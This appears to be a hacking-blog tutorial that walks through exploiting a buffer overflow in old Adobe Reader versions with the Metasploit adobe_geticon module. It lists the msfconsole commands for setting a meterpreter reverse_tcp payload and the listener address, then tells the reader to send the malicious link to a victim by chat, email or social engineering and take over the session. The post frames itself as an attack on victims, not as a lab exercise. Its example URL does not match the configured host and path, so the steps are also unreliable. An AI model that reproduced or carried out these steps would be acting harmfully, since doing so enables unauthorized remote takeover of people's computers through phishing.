This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
Exploit Targets
0 - Adobe Reader Universal (JS Heap Spray) (default)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/adobe_geticon
Msf exploit ( adobe_geticon )>Set payload windows/meterpreter/reverse_tcp
Msf exploit ( adobe_geticon )>show options
Msf exploit ( adobe_geticon)>Set lhost 192.168.1.4 (IP of Local Host)
Msf exploit ( adobe_geticon)>Set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit ( adobe_geticon)>Set uripath meeting (The Url to use for this exploit)
Msf exploit ( adobe_geticon)>exploit
Now an URL you should give to your victim http://192.168.1.3/tendulkar
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
0 komentar:
Speak up your mind
Tell us what you're thinking... !